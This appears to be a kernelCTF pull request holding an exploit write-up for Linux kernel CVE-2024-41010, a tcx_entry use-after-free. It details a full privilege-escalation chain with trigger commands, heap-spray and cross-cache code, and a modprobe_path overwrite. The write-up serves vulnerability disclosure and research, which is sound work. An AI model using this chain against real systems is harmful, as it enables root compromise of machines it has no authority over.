kernelCTF: Add CVE-2024-41010 LTS #128

Open
wants to merge 12 commits into
base: master
Choose a base branch
from
266 changes: 266 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,266 @@
# CVE-2024-41010 Exploit

## Root-cause
Looking at the lifecycle of `tcx_entry`, we can see that it's first allocated when initializing a new ingress/clsact qdisc in `ingress_init` and similar functions:
```c
static int ingress_init(struct Qdisc *sch, struct nlattr *opt,
			struct netlink_ext_ack *extack)
{
	struct ingress_sched_data *q = qdisc_priv(sch);
	struct net_device *dev = qdisc_dev(sch);
	struct bpf_mprog_entry *entry;
	bool created;
	int err;

	if (sch->parent != TC_H_INGRESS)
		return -EOPNOTSUPP;

	net_inc_ingress_queue();

	entry = tcx_entry_fetch_or_create(dev, true, &created); // [1]
	if (!entry)
		return -ENOMEM;
	tcx_miniq_set_active(entry, true); // [2]
	mini_qdisc_pair_init(&q->miniqp, sch, &tcx_entry(entry)->miniq); // [3]
	if (created)
		tcx_entry_update(dev, entry, true);

	q->block_info.binder_type = FLOW_BLOCK_BINDER_TYPE_CLSACT_INGRESS;
	q->block_info.chain_head_change = clsact_chain_head_change;
	q->block_info.chain_head_change_priv = &q->miniqp; // [4]

	err = tcf_block_get_ext(&q->block, sch, &q->block_info, extack);
	if (err)
		return err;

	mini_qdisc_pair_block_init(&q->miniqp, q->block);

	return 0;
}
```
At [1], `tcx_entry_fetch_or_create` is called to either allocate or fetch an existing `tcx_entry` (wrapped by `bpf_mprog_entry`):
```c
static inline struct bpf_mprog_entry *
tcx_entry_fetch_or_create(struct net_device *dev, bool ingress, bool *created)
{
	struct bpf_mprog_entry *entry = tcx_entry_fetch(dev, ingress); // [5]

	*created = false;
	if (!entry) {
		entry = tcx_entry_create();
		if (!entry)
			return NULL;
		*created = true;
	}
	return entry;
}
```
At [2], `tcx_miniq_set_active` sets `tcx_entry->miniq_active` to `true`. Then, at [3], `&tcx_entry(entry)->miniq` (essentially a pointer to the first field of `tcx_entry`) is stored in `q->miniqp`, and a pointer to `q->miniqp` is in turn placed in `q->block_info.chain_head_change_priv` at [4].
If we now also look into the process of releasing an ingress qdisc, we notice something quite interesting:
```c
static void ingress_destroy(struct Qdisc *sch)
{
	struct ingress_sched_data *q = qdisc_priv(sch);
	struct net_device *dev = qdisc_dev(sch);
	struct bpf_mprog_entry *entry = rtnl_dereference(dev->tcx_ingress);

	if (sch->parent != TC_H_INGRESS)
		return;

	tcf_block_put_ext(q->block, sch, &q->block_info);

	if (entry) {
		tcx_miniq_set_active(entry, false);
		if (!tcx_entry_is_active(entry)) {
			tcx_entry_update(dev, NULL, true);
			tcx_entry_free(entry);
		}
	}

	net_dec_ingress_queue();
}
```
In `ingress_destroy`, if there is an existing `tcx_entry` bound to the net device, its `miniq_active` flag is set to false and `tcx_entry_is_active(entry)` is called to determine whether the `tcx_entry` is still in use; if it is not, the reference is removed from the net device and the `tcx_entry` is freed. Let's have a look at `tcx_entry_is_active` now:
```c
static inline bool tcx_entry_is_active(struct bpf_mprog_entry *entry)
{
	ASSERT_RTNL();
	return bpf_mprog_total(entry) || tcx_entry(entry)->miniq_active;
}
```
It checks whether the entry has any bpf programs currently attached (which would hold a view of the entry) or whether the `miniq_active` flag is true, meaning the qdisc view still exists. Since destroying the qdisc sets the flag to false, if we never attach any programs this always returns false and we enter the free path.
This raises the question of what happens if another qdisc fetches the same entry and keeps a reference to it while we delete the first qdisc, causing the entry to be freed. It's worth noting that, to my understanding, two ingress qdiscs can't coexist on the same net device: creating a new one deletes the old qdisc. Interestingly, though, creating a new ingress qdisc calls `ingress_init()` for the new qdisc before ever calling `ingress_destroy()` for the old one, so the reference gets duplicated right before `tcx_entry` is freed, simply by creating an ingress qdisc twice in a row. After the first qdisc is deleted, the second one still holds a pointer to the freed `tcx_entry` in `q->block_info.chain_head_change_priv`, which later gets dereferenced in the call to `mini_qdisc_pair_swap()` via the following call chain:
```c
[...]
static void tcf_chain0_head_change(struct tcf_chain *chain,
				   struct tcf_proto *tp_head)
{
	struct tcf_filter_chain_list_item *item;
	struct tcf_block *block = chain->block;

	if (chain->index)
		return;

	mutex_lock(&block->lock);
	list_for_each_entry(item, &block->chain0.filter_chain_list, list)
		tcf_chain_head_change_item(item, tp_head);
	mutex_unlock(&block->lock);
}
[...]
static void tcf_chain_head_change_item(struct tcf_filter_chain_list_item *item,
				       struct tcf_proto *tp_head)
{
	if (item->chain_head_change)
		item->chain_head_change(tp_head, item->chain_head_change_priv);
}
[...]
static void clsact_chain_head_change(struct tcf_proto *tp_head, void *priv)
{
	struct mini_Qdisc_pair *miniqp = priv;

	mini_qdisc_pair_swap(miniqp, tp_head);
};
```
We can reach this path by adding or removing traffic control filters on the qdisc.

## Triggering vulnerability
- Create a new ingress/clsact qdisc
- Create a second ingress/clsact qdisc, which will cause the following to happen:
- reuse tcx_entry reference
- delete tcx_entry
- delete first qdisc
- add a filter to the second qdisc, which dereferences the dangling pointer and overwrites the first qword of the UAF object with either a pointer into the qdisc struct or NULL
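The steps above can be sketched with plain `tc` commands; this is only an approximation (the exploit drives rtnetlink directly, `eth0` is a placeholder device, and CAP_NET_ADMIN over some net namespace is required):

```shell
# 1) create the first ingress qdisc -- allocates tcx_entry
tc qdisc add dev eth0 ingress
# 2) create a second ingress qdisc: ingress_init() runs for the new qdisc
#    (reusing the existing tcx_entry) before ingress_destroy() runs for the
#    old one (freeing tcx_entry) -> the new qdisc keeps a dangling pointer
tc qdisc replace dev eth0 ingress
# 3) add a filter: tcf_chain0_head_change -> clsact_chain_head_change ->
#    mini_qdisc_pair_swap() dereferences the freed tcx_entry
tc filter add dev eth0 ingress matchall action drop
```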

The dangling pointer is dereferenced in the `mini_qdisc_pair_swap` function:
```c
void mini_qdisc_pair_swap(struct mini_Qdisc_pair *miniqp,
			  struct tcf_proto *tp_head)
{
	/* Protected with chain0->filter_chain_lock.
	 * Can't access chain directly because tp_head can be NULL.
	 */
	struct mini_Qdisc *miniq_old =
		rcu_dereference_protected(*miniqp->p_miniq, 1); // [1]
	struct mini_Qdisc *miniq;

	if (!tp_head) {
		RCU_INIT_POINTER(*miniqp->p_miniq, NULL); // [2]
	} else {
		miniq = miniq_old != &miniqp->miniq1 ?
			&miniqp->miniq1 : &miniqp->miniq2;

		/* We need to make sure that readers won't see the miniq
		 * we are about to modify. So ensure that at least one RCU
		 * grace period has elapsed since the miniq was made
		 * inactive.
		 */
		if (IS_ENABLED(CONFIG_PREEMPT_RT))
			cond_synchronize_rcu(miniq->rcu_state);
		else if (!poll_state_synchronize_rcu(miniq->rcu_state))
			synchronize_rcu_expedited();

		miniq->filter_list = tp_head;
		rcu_assign_pointer(*miniqp->p_miniq, miniq); // [3]
	}

	if (miniq_old)
		/* This is counterpart of the rcu sync above. We need to
		 * block potential new user of miniq_old until all readers
		 * are not seeing it.
		 */
		miniq_old->rcu_state = start_poll_synchronize_rcu(); // [4]
}
```

## Limited UAF
Keep in mind that `miniq` is the first field of `struct tcx_entry` and `miniqp->p_miniq` points at it, while the `mini_Qdisc` buffers (`miniq1`/`miniq2`) live inside the qdisc's private data. So `miniqp->p_miniq` points at the start of the (freed) `tcx_entry`, and any value written through it is a pointer into the middle of a qdisc. Also note that `tcx_entry` lives in kmalloc-2k.
Notice that, at [2], if `tp_head` is NULL, NULL is written through `miniqp->p_miniq`, i.e. to the start of the `tcx_entry`; if `tp_head` is not NULL, a pointer to `miniq` is written at [3] instead, placing a pointer to the middle of a qdisc at the start of the `tcx_entry`. We control whether or not `tp_head` is NULL, so we could try to write NULL. Targeting refcounts with the NULL write is an idea that might come to mind; however, there is a catch: at [1], the original value in the first qword of the UAF object is read before being overwritten, and later, at [4], if it's not NULL, it gets dereferenced as a pointer. So our options are limited to victim objects that either have NULL in their first qword, or that already hold a pointer there and would do something interesting if we overwrote it with NULL or a different pointer.

## Escalate to arbitrary free
My approach was to cross-cache from kmalloc-2k to kmalloc-cg-2k to get access to `msg_msgseg` objects and replace the `msg_msgseg->next` pointer with the `miniq` pointer. This is particularly interesting in our case given that the first field of `struct mini_Qdisc` is `filter_list`, a linked list of `struct tcf_proto` objects bound to filters we can allocate and free at will. Combine this with the fact that receiving a `msg_msgseg` frees whatever is at `msg_msgseg->next`, walking the chain until it finds NULL, and we have a very strong arbitrary-free primitive.
```c
void free_msg(struct msg_msg *msg)
{
	struct msg_msgseg *seg;

	security_msg_msg_free(msg);

	seg = msg->next;
	kfree(msg);
	while (seg != NULL) {
		struct msg_msgseg *tmp = seg->next;

		cond_resched();
		kfree(seg);
		seg = tmp;
	}
}
```
This allows us to do the following:
- make `tcx_entry` dangling
- replace it with a `msg_msgseg`
- add a filter to the qdisc (this both adds a `tcf_proto` to the linked list whose head is at `miniq` and writes the `miniq` pointer into `msg_msgseg->next`)
- read the `msg_msgseg`, which frees it and also iterates over `filter_list`, freeing everything until it finds NULL; this frees our `tcf_proto`, which lives in kmalloc-128.

## Reaching for kmalloc-cg-1k
The end goal of my exploit was to get a double free in kmalloc-cg-1k to overlap a `pipe_buffer` with `skbuf->data` and win. To get there, though, I had to go through some intermediate steps in other caches.

### Getting a pointer to kmalloc-cg-512
Once I had an arbitrary free in kmalloc-128, I decided to cross-cache once again, this time from kmalloc-128 to kmalloc-cg-128, by spraying `msg_msgseg` and reusing the arbitrary free primitive to free a `msg_msgseg` object in kmalloc-cg-128. At this point my goal was to get some object that could give me a pointer to kmalloc-cg-1k, so I could overlap our new, fully controllable `msg_msgseg->next` with it. My first idea was to overlap it with a `msg_msg` object; however, this would end up linking the `msg_msgseg` into the circular `msg_msg` list and cause a hang while freeing the `msg_msgseg`, because the walk would iterate endlessly. After going through some structs, I came across `struct in_ifaddr`:
```c
struct in_ifaddr {
	struct hlist_node	hash;
	struct in_ifaddr	__rcu *ifa_next;
	struct in_device	*ifa_dev;
	struct rcu_head		rcu_head;
	__be32			ifa_local;
	__be32			ifa_address;
	__be32			ifa_mask;
	__u32			ifa_rt_priority;
	__be32			ifa_broadcast;
	unsigned char		ifa_scope;
	unsigned char		ifa_prefixlen;
	unsigned char		ifa_proto;
	__u32			ifa_flags;
	char			ifa_label[IFNAMSIZ];

	/* In seconds, relative to tstamp. Expiry is at tstamp + HZ * lft. */
	__u32			ifa_valid_lft;
	__u32			ifa_preferred_lft;
	unsigned long		ifa_cstamp; /* created timestamp */
	unsigned long		ifa_tstamp; /* updated timestamp */
};
```
This is particularly interesting for two main reasons:
- I can read the `ifa_dev` pointer, which leaks a pointer to a `struct in_device` object in kmalloc-512
- When spraying, I can use the `ifa_address` field as an identifier, so I know which sprayed object overlapped the `msg_msgseg`

A kmalloc-512 pointer is not what I wanted initially, but it's good enough: it's relatively easy to allocate kmalloc-cg-512 pages adjacent to kmalloc-512 pages because they belong to the same page order. With this in mind, I allocated a huge padding of kmalloc-cg-512 `skbuf->data` objects before allocating `in_device`, so when I receive the leak I simply subtract a fixed offset that should shift the pointer to somewhere in the middle of the `skbuf->data` spray.
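A sketch of the `in_ifaddr` spray itself (assumed shape, not the exploit's code): each `ip addr add` allocates a `struct in_ifaddr` whose `ifa_address` encodes the spray index, so the overlapping object can be identified when the `msg_msgseg` is read back. Requires CAP_NET_ADMIN, e.g. inside an unprivileged user+net namespace:

```shell
# spray struct in_ifaddr objects; the low bytes of each address double as
# an index readable through the overlapped msg_msgseg
ip link set lo up
for i in $(seq 1 200); do
	ip addr add "10.0.$((i / 256)).$((i % 256))/32" dev lo
done
```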

### kmalloc-cg-128 -> kmalloc-cg-512
Now that we have a pointer to a `skbuf->data` object in kmalloc-cg-512, we need to somehow write it into our controllable `msg_msgseg` in order to free it. While many handy data-spray techniques seem to be dead by now, I ended up coming across a (seemingly novel) object that could do the job.
```c
static int rtnl_alt_ifname(int cmd, struct net_device *dev, struct nlattr *attr,
			   bool *changed, struct netlink_ext_ack *extack)
{
	char *alt_ifname;
	size_t size;
	int err;

	err = nla_validate(attr, attr->nla_len, IFLA_MAX, ifla_policy, extack);
	[...]
	alt_ifname = nla_strdup(attr, GFP_KERNEL_ACCOUNT);
	[...]
	kfree(alt_ifname);
	if (!err)
		*changed = true;
	return err;
}
```
The `alt_ifname` object is a temporary buffer where user data of arbitrary size is stored, allocated with `GFP_KERNEL_ACCOUNT`. Keep in mind that `rtnl_alt_ifname` is only called from contexts where the rtnl lock is held, so spawning multiple threads to race and spray the temporary buffer won't work; we have to make sure the object we want to overwrite is first on the freelist.
One way of doing this is to incrementally allocate other `msg_msgseg` objects while checking our corrupted `msg_msgseg` with `MSG_COPY`, which reads it without freeing it. This lets me know which of the new `msg_msgseg` objects just overlapped the target one; I then replace it with the `alt_ifname` buffer, finally pointing `msg_msgseg->next` at a `skbuf->data` object in kmalloc-cg-512 and freeing it.

### kmalloc-cg-512 -> kmalloc-cg-1k
kmalloc-cg-512 is already much better than kmalloc-cg-128. We can now overlap a `msg_msg` with our `skbuf->data` object. If we send another message to the same queue as this `msg_msg`, a pointer to the second message lands in the first qword of the first one, so by sending a message that gets allocated in kmalloc-cg-1k we can leak a pointer by reading our `skbuf->data`. If we then slightly increment the pointer, it points to a different `msg_msg` from our spray, owned by a different queue, so we now have a duplicated reference to a `msg_msg` in kmalloc-cg-1k that we can use to get a double free. Manipulating `msg_msg` in this fashion has been covered in detail here: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

## pipe_buffer->page physical read/write > win
Once we get to kmalloc-cg-1k, we can overlap `skbuf->data` with a `pipe_buffer` and control the `pipe_buffer->page` pointer to achieve physical read and write; this technique is thoroughly discussed in https://www.interruptlabs.co.uk/articles/pipe-buffer.
Using this primitive, I overwrite the `modprobe_path` string to point it to a memory file created with `memfd_create`, reachable under `/proc/<pid>/fd/<n>`. I also bruteforce the pid of the exploit process outside of the sandboxed namespace. This has all been very well described in https://pwning.tech/nftables/#4-techniques
# Novel Techniques

## kmalloc-2k groom/potential target object: `bpf_prog_aux`
```c
struct bpf_prog *bpf_prog_alloc_no_stats(unsigned int size, gfp_t gfp_extra_flags)
{
	gfp_t gfp_flags = bpf_memcg_flags(GFP_KERNEL | __GFP_ZERO | gfp_extra_flags);
	struct bpf_prog_aux *aux;
	[...]
	aux = kzalloc(sizeof(*aux), bpf_memcg_flags(GFP_KERNEL | gfp_extra_flags));
	[...]
}
```
The `bpf_prog_aux` object is allocated by `bpf_prog_alloc_no_stats`.
It can be allocated from userland by creating an empty bpf program:
```c
struct bpf_insn insns[] = {
	BPF_MOV64_IMM(BPF_REG_0, 4),
	BPF_EXIT_INSN(),
};
[...]
union bpf_attr prog_attr = {
	.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
	.insn_cnt = sizeof(insns) / sizeof(insns[0]),
	.insns = (uint64_t)insns,
	.license = (uint64_t)"GPL v2",
	.log_level = 0,
	.log_size = 0,
	.log_buf = (uint64_t)0,
};

[...]
/* defrag 2k slab (bpf_prog_aux) */
int progfd[SPRAY];
puts("[*] kmalloc-2k defrag");
for (int i = 0; i < 3 * SPRAY / 4; i++) {
	progfd[i] = bpf(BPF_PROG_LOAD, &prog_attr);
	if (progfd[i] == -1)
		errout("bpf(BPF_PROG_LOAD)");
}
```

It can later be freed by simply closing the bpf program's fd:
```c
/* free slab containing tcx_entry (return it to buddy) */
printf("[*] cross-cache (kmalloc-2k -> kmalloc-cg-2k)\n");
for (int i = SPRAY / 2; i < SPRAY; i++)
	close(progfd[i]);
```

This is useful for spraying and manipulating the heap layout in kmalloc-2k, and it's what I ended up using to hold kmalloc-2k slabs that I later return to the page allocator for my cross-cache. It's also worth noting that the first qword is a refcount tracking the lifetime of the bpf program bound to it, which can make it an interesting target for exploitation; however, I didn't end up using it for that purpose, for the reasons described in `exploit.md`, so I'm only mentioning this as a side note.

## Arbitrary data spray object: `alt_ifname`
```c
static int rtnl_alt_ifname(int cmd, struct net_device *dev, struct nlattr *attr,
			   bool *changed, struct netlink_ext_ack *extack)
{
	char *alt_ifname;
	size_t size;
	int err;

	err = nla_validate(attr, attr->nla_len, IFLA_MAX, ifla_policy, extack);
	[...]
	alt_ifname = nla_strdup(attr, GFP_KERNEL_ACCOUNT);
	[...]
	kfree(alt_ifname);
	if (!err)
		*changed = true;
	return err;
}
```
The `alt_ifname` object is a temporary buffer where user data of arbitrary size is stored, allocated with `GFP_KERNEL_ACCOUNT`. Keep in mind that `rtnl_alt_ifname` is only called from contexts where the rtnl lock is held, so spawning multiple threads to race and spray the temporary buffer won't work; we have to make sure the object we want to overwrite is first on the freelist.

## Cross-cache stabilization technique/trick
```c
/* create cg-4k partial slabs to avoid disputing buddy pages with cg-2k */
puts("[*] kmalloc-cg-4k partial slabs");
for (int i = 0; i < SPRAY; i++)
	msgsnd(frag4k[i], msg, 4096 - 48, 0);
for (int i = 8; i < SPRAY; i++) {
	if (!(i % 8))
		continue;
	if (msgrcv(frag4k[i], msg, 4096 - 48, MTYPE_PRIMARY, 0) < 0)
		errout("msgrcv");
}
```
I further improve cross-cache stability by purposefully fragmenting other caches that I don't want to take the freed slab: I create several used slabs and leave only one object in each, producing partial slabs with freelists that `kmalloc()` can chew on long before it starts asking for new pages. In my exploit, both `msg_msg` in kmalloc-cg-4k and `msg_msgseg` in kmalloc-cg-2k get allocated in the same path, but I want to make sure `msg_msgseg` takes the freed slab from the page allocator. To ensure that, not only do I defrag kmalloc-cg-2k (common knowledge), I also frag kmalloc-cg-4k with partial slabs (novel to the best of my knowledge), which took the success rate of this specific step from less than 40% to succeeding the great majority of the time.